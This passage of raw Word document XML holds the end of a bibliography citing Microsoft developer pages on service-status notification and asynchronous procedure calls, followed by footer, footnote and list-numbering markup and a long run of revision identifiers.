              </w:r>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t xml:space="preserve"> NotifyServiceStatusChange function. </w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:i/>
                  <w:iCs/>
                  <w:noProof/>
                </w:rPr>
                <w:t xml:space="preserve">Windows Developer Center. </w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t>[Online] Microsoft. https://msdn.microsoft.com/en-us/library/windows/desktop/ms684276(v=vs.85).aspx.</w:t>
              </w:r>
            </w:p>
            <w:p w:rsidR="000F3FD1" w:rsidRDefault="000F3FD1" w:rsidP="000F3FD1">
              <w:pPr>
                <w:pStyle w:val="Bibliography"/>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
              </w:pPr>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t xml:space="preserve">23. </w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:b/>
                  <w:bCs/>
                  <w:noProof/>
                </w:rPr>
                <w:t>Team, Microsoft Developer.</w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t xml:space="preserve"> Asynchronous Procedure Calls. </w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:i/>
                  <w:iCs/>
                  <w:noProof/>
                </w:rPr>
                <w:t xml:space="preserve">Microsoft Developer Center. </w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t>[Online] Microsoft. https://msdn.microsoft.com/en-us/library/windows/desktop/ms681951(v=vs.85).aspx.</w:t>
              </w:r>
            </w:p>
            <w:p w:rsidR="000F3FD1" w:rsidRDefault="000F3FD1" w:rsidP="000F3FD1">
              <w:r>
                <w:rPr>
                  <w:b/>
                  <w:bCs/>
                  <w:noProof/>
                </w:rPr>
                <w:fldChar w:fldCharType="end"/>
              </w:r>
            </w:p>
          </w:sdtContent>
        </w:sdt>
      </w:sdtContent>
    </w:sdt>
    <w:p w:rsidR="000F3FD1" w:rsidRPr="000F3FD1" w:rsidRDefault="000F3FD1" w:rsidP="000F3FD1"/>
    <w:p w:rsidR="004D7C5A" w:rsidRPr="004D7C5A" w:rsidRDefault="004D7C5A" w:rsidP="004D7C5A"/>
    <w:sectPr w:rsidR="004D7C5A" w:rsidRPr="004D7C5A" w:rsidSect="000C0B89">
      <w:footerReference w:type="default" r:id="rId71"/>
      <w:pgSz w:w="11909" w:h="16834" w:code="9"/>
      <w:pgMar w:top="1588" w:right="1134" w:bottom="187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1124" w:rsidRDefault="00881124" w:rsidP="000C0B89">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00881124" w:rsidRDefault="00881124" w:rsidP="000C0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75B" w:rsidRDefault="00DE07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8953553"/>
      <w:docPartObj>
        <w:docPartGallery w:val="Page Numbers (Bottom of Page)"/>
        <w:docPartUnique/>
      </w:docPartObj>
    </w:sdtPr>
    <w:sdtEndPr>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
    </w:sdtEndPr>
    <w:sdtContent>
      <w:p w:rsidR="00DE075B" w:rsidRDefault="00DE075B">
        <w:pPr>
          <w:pStyle w:val="Footer"/>
          <w:jc w:val="center"/>
        </w:pPr>
      </w:p>
      <w:p w:rsidR="00DE075B" w:rsidRDefault="00DE075B">
        <w:pPr>
          <w:pStyle w:val="Footer"/>
          <w:jc w:val="center"/>
        </w:pPr>
      </w:p>
    </w:sdtContent>
  </w:sdt>
  <w:p w:rsidR="00DE075B" w:rsidRDefault="00DE07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75B" w:rsidRDefault="00DE075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0022209"/>
      <w:docPartObj>
        <w:docPartGallery w:val="Page Numbers (Bottom of Page)"/>
        <w:docPartUnique/>
      </w:docPartObj>
    </w:sdtPr>
    <w:sdtEndPr>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
    </w:sdtEndPr>
    <w:sdtContent>
      <w:p w:rsidR="00DE075B" w:rsidRDefault="00DE075B">
        <w:pPr>
          <w:pStyle w:val="Footer"/>
          <w:jc w:val="center"/>
        </w:pPr>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <mc:AlternateContent>
            <mc:Choice Requires="wps">
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="72D81B01" wp14:editId="6790FCA5">
                  <wp:extent cx="5467350" cy="45085"/>
                  <wp:effectExtent l="0" t="9525" r="0" b="2540"/>
                  <wp:docPr id="7" name="Flowchart: Decisio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FB9DAB9" id="_x0000_t110" coordsize="21600,21600" o:spt="110" path="m10800,l,10800,10800,21600,21600,10800xe">
                  <v:stroke joinstyle="miter"/>
                  <v:path gradientshapeok="t" o:connecttype="rect" textboxrect="5400,5400,16200,16200"/>
                </v:shapetype>
                <v:shape id="Flowchart: Decision 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U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H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CFSX/U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rsidR="00DE075B" w:rsidRDefault="00DE075B">
        <w:pPr>
          <w:pStyle w:val="Footer"/>
          <w:jc w:val="center"/>
        </w:pPr>
        <w:r>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:instrText xml:space="preserve"> PAGE    \* MERGEFORMAT </w:instrText>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00C973CF">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>76</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:p>
    </w:sdtContent>
  </w:sdt>
  <w:p w:rsidR="00DE075B" w:rsidRDefault="00DE07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1124" w:rsidRDefault="00881124" w:rsidP="000C0B89">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00881124" w:rsidRDefault="00881124" w:rsidP="000C0B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75B" w:rsidRDefault="00DE07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75B" w:rsidRDefault="00DE075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75B" w:rsidRDefault="00DE07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E4216"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EAC0853A"/>
    <w:lvl w:ilvl="0" w:tplc="4B4616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1118B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DA30211A"/>
    <w:lvl w:ilvl="0" w:tplc="81F899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8C871EE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BFFCA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560A0A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D28825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4400E9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="12D24BA0"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="Chapter %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E46139F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="ACFE0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85BA8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="07080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69297D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="18362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044A13"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3F680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5322B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E57C5F76"/>
    <w:lvl w:ilvl="0" w:tplc="62A02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573377"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7300461E"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="Chapter"/>
      <w:lvlText w:val="Chapter %1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>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47F1A0E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DB783CBA"/>
    <w:lvl w:ilvl="0" w:tplc="DBF4B40C">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7F1CA3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="65280828"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="Heading1"/>
      <w:lvlText w:val="Chapter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5194AC8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AF20E64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8074C0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="834C8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4F7DBD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8B8886A4"/>
    <w:lvl w:ilvl="0" w:tplc="0F9C4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26B14AA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="51860532"/>
    <w:lvl w:ilvl="0" w:tplc="AF944D52">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B93A15"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="785A90AA"/>
    <w:lvl w:ilvl="0" w:tplc="97948EAA">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0A6202"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C4C09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91239A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2E8624E0"/>
    <w:lvl w:ilvl="0" w:tplc="2D627B0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D81F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4816235"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2B862078"/>
    <w:lvl w:ilvl="0" w:tplc="B2562A1E">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2" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="6BAB4C28"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D87A4A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0C72F8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="03D08448"/>
    <w:lvl w:ilvl="0" w:tplc="0409000F">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:color w:val="000000"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="AF944D52">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="1.%2   "/>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4D69DC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9E967E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0"/>
  </w:num>
  <w:num w:numId="3">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="1"/>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6"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="18">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="19">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="20">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="21">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="22">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="23">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="24">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="25">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="26">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="27">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="28">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="29">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="30">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="31">
    <w:abstractNumId w:val="23"/>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388"/>
    <w:rsid w:val="00003BB7"/>
    <w:rsid w:val="00006825"/>
    <w:rsid w:val="00010AEF"/>
    <w:rsid w:val="00023C3A"/>
    <w:rsid w:val="00026B5A"/>
    <w:rsid w:val="00030F92"/>
    <w:rsid w:val="00047AC7"/>
    <w:rsid w:val="0005024F"/>
    <w:rsid w:val="00050E57"/>
    <w:rsid w:val="00054518"/>
    <w:rsid w:val="000550EA"/>
    <w:rsid w:val="0005763A"/>
    <w:rsid w:val="0006024B"/>
    <w:rsid w:val="00061DAF"/>
    <w:rsid w:val="00062D79"/>
    <w:rsid w:val="00063A1C"/>
    <w:rsid w:val="00063F47"/>
    <w:rsid w:val="00064EB7"/>
    <w:rsid w:val="000679BF"/>
    <w:rsid w:val="00067ED0"/>
    <w:rsid w:val="000830B7"/>
    <w:rsid w:val="00087128"/>
    <w:rsid w:val="00094EB9"/>
    <w:rsid w:val="00095BB2"/>
    <w:rsid w:val="000A3225"/>
    <w:rsid w:val="000A4306"/>
    <w:rsid w:val="000A48F6"/>
    <w:rsid w:val="000A77FD"/>
    <w:rsid w:val="000A7B42"/>
    <w:rsid w:val="000B0473"/>
    <w:rsid w:val="000B5278"/>
    <w:rsid w:val="000B5B0F"/>
    <w:rsid w:val="000B664D"/>
    <w:rsid w:val="000B77BF"/>
    <w:rsid w:val="000C0B89"/>
    <w:rsid w:val="000C11BF"/>
    <w:rsid w:val="000D022A"/>
    <w:rsid w:val="000D1EBA"/>
    <w:rsid w:val="000D4E08"/>
    <w:rsid w:val="000E03A2"/>
    <w:rsid w:val="000F005C"/>
    <w:rsid w:val="000F39ED"/>
    <w:rsid w:val="000F3FD1"/>
    <w:rsid w:val="000F6B4C"/>
    <w:rsid w:val="00126710"/>
    <w:rsid w:val="00130837"/>
    <w:rsid w:val="00130C5A"/>
    <w:rsid w:val="00131B99"/>
    <w:rsid w:val="00133620"/>
    <w:rsid w:val="00134A20"/>
    <w:rsid w:val="00134A41"/>
    <w:rsid w:val="00135336"/>
    <w:rsid w:val="00137AE0"/>
    <w:rsid w:val="001417F4"/>
    <w:rsid w:val="001425DB"/>
    <w:rsid w:val="0015082A"/>
    <w:rsid w:val="00152570"/>
    <w:rsid w:val="001541BB"/>
    <w:rsid w:val="001561F9"/>
    <w:rsid w:val="00156C89"/>
    <w:rsid w:val="001670A1"/>
    <w:rsid w:val="00173F3F"/>
    <w:rsid w:val="00177021"/>
    <w:rsid w:val="001858EF"/>
    <w:rsid w:val="00196A18"/>
    <w:rsid w:val="001A6FED"/>
    <w:rsid w:val="001B297E"/>
    <w:rsid w:val="001B6B58"/>
    <w:rsid w:val="001C2E70"/>
    <w:rsid w:val="001C31D5"/>
    <w:rsid w:val="001C670A"/>
    <w:rsid w:val="001D0746"/>
    <w:rsid w:val="001D11AB"/>
    <w:rsid w:val="001D1C85"/>
    <w:rsid w:val="001D2799"/>
    <w:rsid w:val="001E6C8C"/>
    <w:rsid w:val="001E7337"/>
    <w:rsid w:val="00200338"/>
    <w:rsid w:val="00202D03"/>
    <w:rsid w:val="002052C4"/>
    <w:rsid w:val="00211D26"/>
    <w:rsid w:val="00215BF8"/>
    <w:rsid w:val="00232F6A"/>
    <w:rsid w:val="00235F8C"/>
    <w:rsid w:val="00245C09"/>
    <w:rsid w:val="00245FA6"/>
    <w:rsid w:val="00247427"/>
    <w:rsid w:val="002502B7"/>
    <w:rsid w:val="0025062C"/>
    <w:rsid w:val="00252341"/>
    <w:rsid w:val="002558B0"/>
    <w:rsid w:val="002565A7"/>
    <w:rsid w:val="00260497"/>
    <w:rsid w:val="00260563"/>
    <w:rsid w:val="00266A24"/>
    <w:rsid w:val="002723A5"/>
    <w:rsid w:val="00280207"/>
    <w:rsid w:val="00281521"/>
    <w:rsid w:val="00284E83"/>
    <w:rsid w:val="00287BCD"/>
    <w:rsid w:val="00290AB6"/>
    <w:rsid w:val="002935B6"/>
    <w:rsid w:val="00297A98"/>
    <w:rsid w:val="002A12C8"/>
    <w:rsid w:val="002B5F3A"/>
    <w:rsid w:val="002B600A"/>
    <w:rsid w:val="002B7458"/>
    <w:rsid w:val="002B7F94"/>
    <w:rsid w:val="002C2B3F"/>
    <w:rsid w:val="002C43F1"/>
    <w:rsid w:val="002D0BB9"/>
    <w:rsid w:val="002D356E"/>
    <w:rsid w:val="002F6C96"/>
    <w:rsid w:val="003024F5"/>
    <w:rsid w:val="003043ED"/>
    <w:rsid w:val="0030797D"/>
    <w:rsid w:val="00311405"/>
    <w:rsid w:val="0031291A"/>
    <w:rsid w:val="003137A0"/>
    <w:rsid w:val="0031433A"/>
    <w:rsid w:val="0031762B"/>
    <w:rsid w:val="00320ED1"/>
    <w:rsid w:val="0032487F"/>
    <w:rsid w:val="00325366"/>
    <w:rsid w:val="00325EC6"/>
    <w:rsid w:val="00326F1A"/>
    <w:rsid w:val="0033002B"/>
    <w:rsid w:val="003328A2"/>
    <w:rsid w:val="0033426A"/>
    <w:rsid w:val="003371FE"/>
    <w:rsid w:val="0034161F"/>
    <w:rsid w:val="00345B0F"/>
    <w:rsid w:val="00350C9B"/>
    <w:rsid w:val="003527B4"/>
    <w:rsid w:val="00362FBB"/>
    <w:rsid w:val="00364852"/>
    <w:rsid w:val="00364F5C"/>
    <w:rsid w:val="003712A1"/>
    <w:rsid w:val="003725C1"/>
    <w:rsid w:val="0037653E"/>
    <w:rsid w:val="00377E30"/>
    <w:rsid w:val="003802AB"/>
    <w:rsid w:val="003813AA"/>
    <w:rsid w:val="003813E4"/>
    <w:rsid w:val="00387B49"/>
    <w:rsid w:val="00390127"/>
    <w:rsid w:val="00394749"/>
    <w:rsid w:val="0039660C"/>
    <w:rsid w:val="003A23CE"/>
    <w:rsid w:val="003A6E7F"/>
    <w:rsid w:val="003A6EDB"/>
    <w:rsid w:val="003B1B5E"/>
    <w:rsid w:val="003B53B6"/>
    <w:rsid w:val="003B67D3"/>
    <w:rsid w:val="003B77C9"/>
    <w:rsid w:val="003C1ED4"/>
    <w:rsid w:val="003C3159"/>
    <w:rsid w:val="003C365B"/>
    <w:rsid w:val="003D183A"/>
    <w:rsid w:val="003D5563"/>
    <w:rsid w:val="003E0366"/>
    <w:rsid w:val="003E2A6F"/>
    <w:rsid w:val="003F21BB"/>
    <w:rsid w:val="003F301F"/>
    <w:rsid w:val="003F590C"/>
    <w:rsid w:val="00401671"/>
    <w:rsid w:val="00406E91"/>
    <w:rsid w:val="00407D41"/>
    <w:rsid w:val="004113CB"/>
    <w:rsid w:val="0042288E"/>
    <w:rsid w:val="00430F22"/>
    <w:rsid w:val="00430FE0"/>
    <w:rsid w:val="004534AE"/>
    <w:rsid w:val="00454802"/>
    <w:rsid w:val="00457C49"/>
    <w:rsid w:val="00466561"/>
    <w:rsid w:val="0047170D"/>
    <w:rsid w:val="00476ACA"/>
    <w:rsid w:val="0047771F"/>
    <w:rsid w:val="0048196B"/>
    <w:rsid w:val="004827A8"/>
    <w:rsid w:val="004829A7"/>
    <w:rsid w:val="00495982"/>
    <w:rsid w:val="004A1113"/>
    <w:rsid w:val="004A4D8F"/>
    <w:rsid w:val="004A69C8"/>
    <w:rsid w:val="004B0379"/>
    <w:rsid w:val="004B1D3D"/>
    <w:rsid w:val="004C3F6D"/>
    <w:rsid w:val="004C6026"/>
    <w:rsid w:val="004C6A4E"/>
    <w:rsid w:val="004D192C"/>
    <w:rsid w:val="004D43D6"/>
    <w:rsid w:val="004D7C5A"/>
    <w:rsid w:val="004E0912"/>
    <w:rsid w:val="004E2049"/>
    <w:rsid w:val="00503832"/>
    <w:rsid w:val="0051408A"/>
    <w:rsid w:val="00514FF3"/>
    <w:rsid w:val="005250D5"/>
    <w:rsid w:val="00525B3D"/>
    <w:rsid w:val="00526388"/>
    <w:rsid w:val="00541694"/>
    <w:rsid w:val="0054192D"/>
    <w:rsid w:val="00545569"/>
    <w:rsid w:val="00546E51"/>
    <w:rsid w:val="0055127B"/>
    <w:rsid w:val="00562238"/>
    <w:rsid w:val="00572008"/>
    <w:rsid w:val="00576CC6"/>
    <w:rsid w:val="00577F94"/>
    <w:rsid w:val="00580A9D"/>
    <w:rsid w:val="00580F86"/>
    <w:rsid w:val="00581DDE"/>
    <w:rsid w:val="00584149"/>
    <w:rsid w:val="00592005"/>
    <w:rsid w:val="00594D87"/>
    <w:rsid w:val="005A10E7"/>
    <w:rsid w:val="005A1547"/>
    <w:rsid w:val="005A5C0D"/>
    <w:rsid w:val="005B1D4D"/>
    <w:rsid w:val="005C05B7"/>
    <w:rsid w:val="005C4649"/>
    <w:rsid w:val="005C4E19"/>
    <w:rsid w:val="005C5F8C"/>
    <w:rsid w:val="005C63B5"/>
    <w:rsid w:val="005D44C6"/>
    <w:rsid w:val="00600BA7"/>
    <w:rsid w:val="00601780"/>
    <w:rsid w:val="00602CF8"/>
    <w:rsid w:val="00604388"/>
    <w:rsid w:val="00620473"/>
    <w:rsid w:val="00621518"/>
    <w:rsid w:val="006235EF"/>
    <w:rsid w:val="00630EC7"/>
    <w:rsid w:val="00634607"/>
    <w:rsid w:val="006565FE"/>
    <w:rsid w:val="00672188"/>
    <w:rsid w:val="00680540"/>
    <w:rsid w:val="006867D5"/>
    <w:rsid w:val="006A2017"/>
    <w:rsid w:val="006A21F8"/>
    <w:rsid w:val="006A30E1"/>
    <w:rsid w:val="006A3B63"/>
    <w:rsid w:val="006A5361"/>
    <w:rsid w:val="006A6051"/>
    <w:rsid w:val="006B6E8A"/>
    <w:rsid w:val="006D2D3D"/>
    <w:rsid w:val="006F1CBF"/>
    <w:rsid w:val="007074B2"/>
    <w:rsid w:val="00707CB3"/>
    <w:rsid w:val="0072132A"/>
    <w:rsid w:val="007235C2"/>
    <w:rsid w:val="00730D2E"/>
    <w:rsid w:val="00743CCD"/>
    <w:rsid w:val="0074553E"/>
    <w:rsid w:val="00754DC7"/>
    <w:rsid w:val="007634B2"/>
    <w:rsid w:val="00763FEA"/>
    <w:rsid w:val="007644D7"/>
    <w:rsid w:val="0076640B"/>
    <w:rsid w:val="00782346"/>
    <w:rsid w:val="00790A80"/>
    <w:rsid w:val="00790F27"/>
    <w:rsid w:val="0079537F"/>
    <w:rsid w:val="007A6F8C"/>
    <w:rsid w:val="007B5D92"/>
    <w:rsid w:val="007C596B"/>
    <w:rsid w:val="007C5A92"/>
    <w:rsid w:val="007D073C"/>
    <w:rsid w:val="007D1D38"/>
    <w:rsid w:val="007D4BC6"/>
    <w:rsid w:val="007D52D3"/>
    <w:rsid w:val="007D6443"/>
    <w:rsid w:val="007E1A04"/>
    <w:rsid w:val="007E3DD2"/>
    <w:rsid w:val="007E611D"/>
    <w:rsid w:val="007E68F2"/>
    <w:rsid w:val="00803051"/>
    <w:rsid w:val="00811A53"/>
    <w:rsid w:val="008173F2"/>
    <w:rsid w:val="0082423F"/>
    <w:rsid w:val="00830CDC"/>
    <w:rsid w:val="00841223"/>
    <w:rsid w:val="00845030"/>
    <w:rsid w:val="00845C37"/>
    <w:rsid w:val="00850E34"/>
    <w:rsid w:val="0085113D"/>
    <w:rsid w:val="00851DC4"/>
    <w:rsid w:val="00856098"/>
    <w:rsid w:val="00861E5F"/>
    <w:rsid w:val="008625D0"/>
    <w:rsid w:val="00865126"/>
    <w:rsid w:val="00865A00"/>
    <w:rsid w:val="008668F2"/>
    <w:rsid w:val="00872321"/>
    <w:rsid w:val="00877325"/>
    <w:rsid w:val="00881124"/>
    <w:rsid w:val="008847F5"/>
    <w:rsid w:val="00894091"/>
    <w:rsid w:val="00896C1B"/>
    <w:rsid w:val="008A23FC"/>
    <w:rsid w:val="008A2754"/>
    <w:rsid w:val="008B23B2"/>
    <w:rsid w:val="008B4B82"/>
    <w:rsid w:val="008B60E4"/>
    <w:rsid w:val="008B6D53"/>
    <w:rsid w:val="008C06C7"/>
    <w:rsid w:val="008C0E09"/>
    <w:rsid w:val="008C5799"/>
    <w:rsid w:val="008C5BAA"/>
    <w:rsid w:val="008D132E"/>
    <w:rsid w:val="008D3B35"/>
    <w:rsid w:val="008E4183"/>
    <w:rsid w:val="008F0F14"/>
    <w:rsid w:val="008F4BF7"/>
    <w:rsid w:val="00901234"/>
    <w:rsid w:val="00901910"/>
    <w:rsid w:val="00904D1E"/>
    <w:rsid w:val="009067EA"/>
    <w:rsid w:val="00910021"/>
    <w:rsid w:val="00910D7B"/>
    <w:rsid w:val="00914C39"/>
    <w:rsid w:val="00921418"/>
    <w:rsid w:val="00927DA6"/>
    <w:rsid w:val="0093414E"/>
    <w:rsid w:val="00944C64"/>
    <w:rsid w:val="00955443"/>
    <w:rsid w:val="00964D71"/>
    <w:rsid w:val="009676F8"/>
    <w:rsid w:val="009729D4"/>
    <w:rsid w:val="00976DC2"/>
    <w:rsid w:val="009862B5"/>
    <w:rsid w:val="00990FA2"/>
    <w:rsid w:val="00993912"/>
    <w:rsid w:val="00994A2F"/>
    <w:rsid w:val="00994B42"/>
    <w:rsid w:val="009A1B99"/>
    <w:rsid w:val="009A2690"/>
    <w:rsid w:val="009A5E7D"/>
    <w:rsid w:val="009B04F7"/>
    <w:rsid w:val="009B2BE7"/>
    <w:rsid w:val="009B5282"/>
    <w:rsid w:val="009C38F0"/>
    <w:rsid w:val="009D33EA"/>
    <w:rsid w:val="009D36EB"/>
    <w:rsid w:val="009D4270"/>
    <w:rsid w:val="009F10AF"/>
    <w:rsid w:val="009F29DA"/>
    <w:rsid w:val="009F4123"/>
    <w:rsid w:val="00A03AA4"/>
    <w:rsid w:val="00A067CE"/>
    <w:rsid w:val="00A1554A"/>
    <w:rsid w:val="00A240EA"/>
    <w:rsid w:val="00A2470A"/>
    <w:rsid w:val="00A3196D"/>
    <w:rsid w:val="00A35B52"/>
    <w:rsid w:val="00A42FD3"/>
    <w:rsid w:val="00A432FD"/>
    <w:rsid w:val="00A44E12"/>
    <w:rsid w:val="00A45170"/>
    <w:rsid w:val="00A51D11"/>
    <w:rsid w:val="00A53CB7"/>
    <w:rsid w:val="00A60265"/>
    <w:rsid w:val="00A738C2"/>
    <w:rsid w:val="00A753E4"/>
    <w:rsid w:val="00A81747"/>
    <w:rsid w:val="00A8226C"/>
    <w:rsid w:val="00A90303"/>
    <w:rsid w:val="00A91688"/>
    <w:rsid w:val="00A94909"/>
    <w:rsid w:val="00A94DD6"/>
    <w:rsid w:val="00A95E8E"/>
    <w:rsid w:val="00AA7BD6"/>
    <w:rsid w:val="00AB2F74"/>
    <w:rsid w:val="00AC114D"/>
    <w:rsid w:val="00AC1E06"/>
    <w:rsid w:val="00AC3737"/>
    <w:rsid w:val="00AC6309"/>
    <w:rsid w:val="00AC6729"/>
    <w:rsid w:val="00AD0CD2"/>
    <w:rsid w:val="00AD10D8"/>
    <w:rsid w:val="00AE0062"/>
    <w:rsid w:val="00AE511C"/>
    <w:rsid w:val="00AE6875"/>
    <w:rsid w:val="00AF24DE"/>
    <w:rsid w:val="00AF4962"/>
    <w:rsid w:val="00AF4EA3"/>
    <w:rsid w:val="00AF58DA"/>
    <w:rsid w:val="00AF7236"/>
    <w:rsid w:val="00B02E5E"/>
    <w:rsid w:val="00B0640C"/>
    <w:rsid w:val="00B17C91"/>
    <w:rsid w:val="00B23BE4"/>
    <w:rsid w:val="00B32308"/>
    <w:rsid w:val="00B37AF9"/>
    <w:rsid w:val="00B41F3B"/>
    <w:rsid w:val="00B42A19"/>
    <w:rsid w:val="00B46827"/>
    <w:rsid w:val="00B56746"/>
    <w:rsid w:val="00B71863"/>
    <w:rsid w:val="00B728B7"/>
    <w:rsid w:val="00B77A88"/>
    <w:rsid w:val="00B8041C"/>
    <w:rsid w:val="00B81AF2"/>
    <w:rsid w:val="00B82687"/>
    <w:rsid w:val="00B9013B"/>
    <w:rsid w:val="00B91AB3"/>
    <w:rsid w:val="00B94D16"/>
    <w:rsid w:val="00BA1B83"/>
    <w:rsid w:val="00BA1DEF"/>
    <w:rsid w:val="00BA32A4"/>
    <w:rsid w:val="00BA52F8"/>
    <w:rsid w:val="00BA60B3"/>
    <w:rsid w:val="00BB1F1C"/>
    <w:rsid w:val="00BB3774"/>
    <w:rsid w:val="00BC159D"/>
    <w:rsid w:val="00BC587C"/>
    <w:rsid w:val="00BD03D9"/>
    <w:rsid w:val="00BD3224"/>
    <w:rsid w:val="00BD3EE8"/>
    <w:rsid w:val="00BE402E"/>
    <w:rsid w:val="00BE47BE"/>
    <w:rsid w:val="00BE5065"/>
    <w:rsid w:val="00BF4742"/>
    <w:rsid w:val="00BF4EFF"/>
    <w:rsid w:val="00C00E3F"/>
    <w:rsid w:val="00C0486E"/>
    <w:rsid w:val="00C111F5"/>
    <w:rsid w:val="00C21216"/>
    <w:rsid w:val="00C258C6"/>
    <w:rsid w:val="00C27956"/>
    <w:rsid w:val="00C352B0"/>
    <w:rsid w:val="00C40A43"/>
    <w:rsid w:val="00C425FC"/>
    <w:rsid w:val="00C437AB"/>
    <w:rsid w:val="00C44A6F"/>
